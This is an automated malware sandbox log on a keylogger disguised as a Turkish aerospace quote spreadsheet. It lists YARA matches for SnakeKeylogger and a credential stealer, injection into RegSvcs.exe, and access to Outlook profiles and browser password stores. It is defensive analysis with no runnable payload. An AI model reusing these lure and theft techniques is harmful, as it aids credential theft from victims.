                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_050E50282_2_050E5028
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_050EE2582_2_050EE258
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_050ED5402_2_050ED540
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_050ED5502_2_050ED550
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_050EDDF12_2_050EDDF1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_050E9C422_2_050E9C42
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_050EFC682_2_050EFC68
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_050E9C632_2_050E9C63
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_050ECCA02_2_050ECCA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_050EEF512_2_050EEF51
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_050EEF602_2_050EEF60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_050E178F2_2_050E178F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_050E17A02_2_050E17A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_050EDE002_2_050EDE00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_050E1E702_2_050E1E70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_050E1E802_2_050E1E80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_050EE6AF2_2_050EE6AF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_050EE6B02_2_050EE6B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_050E29682_2_050E2968
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_050ED9992_2_050ED999
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_050ED9A82_2_050ED9A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_050E00062_2_050E0006
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_050EF8022_2_050EF802
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_050E50182_2_050E5018
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_050EF8102_2_050EF810
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_050E00402_2_050E0040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_050ED0F82_2_050ED0F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_050EEB082_2_050EEB08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_050E93282_2_050E9328
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_050E0B202_2_050E0B20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_050E0B302_2_050E0B30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_050E8B902_2_050E8B90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_050E8BA02_2_050E8BA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_050EF3B82_2_050EF3B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_050EE24A2_2_050EE24A
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: String function: 0019F9F2 appears 40 times
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: String function: 00189CB3 appears 31 times
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: String function: 001A0A30 appears 46 times
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000003.1454744475.000000000438D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000003.1452729037.00000000041E3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 2.2.RegSvcs.exe.350000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 2.2.RegSvcs.exe.350000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 2.2.RegSvcs.exe.350000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000002.00000002.2656573974.0000000000352000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 7876, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: RegSvcs.exe PID: 7960, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.raw.unpack, COVID19.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/2@3/3
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001F37B5 GetLastError,FormatMessageW,0_2_001F37B5
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001E10BF AdjustTokenPrivileges,CloseHandle,0_2_001E10BF
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001E16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_001E16C3
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001F51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_001F51CD
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_0020A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0020A67C
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001F648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_001F648E
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001842A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_001842A2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeFile created: C:\Users\user\AppData\Local\Temp\aut2654.tmpJump to behavior
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: RegSvcs.exe, 00000002.00000002.2658183432.0000000002ABA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeVirustotal: Detection: 29%
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeReversingLabs: Detection: 36%
                  Source: unknownProcess created: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe "C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe"
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe"
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeSection loaded: iconcodecservice.dllJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeStatic file information: File size 1079296 > 1048576
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: wntdll.pdbUGP source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000003.1450691724.0000000004070000.00000004.00001000.00020000.00000000.sdmp, TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000003.1450829207.0000000004210000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000003.1450691724.0000000004070000.00000004.00001000.00020000.00000000.sdmp, TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000003.1450829207.0000000004210000.00000004.00001000.00020000.00000000.sdmp
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001842DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_001842DE
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001A0A76 push ecx; ret 0_2_001A0A89
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00D49C30 push esp; retf 0276h2_2_00D49D55
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_050E2DBE pushfd ; retf 2_2_050E2DC1
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeFile created: \tekl#u0130f #u0130ste#u011e#u0130 - tusa#u015e t#u00dcrk havacilik uzay sanay#u0130#u0130_xlsx.exe
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeFile created: \tekl#u0130f #u0130ste#u011e#u0130 - tusa#u015e t#u00dcrk havacilik uzay sanay#u0130#u0130_xlsx.exeJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_0019F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0019F98E
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00211C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00211C41
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
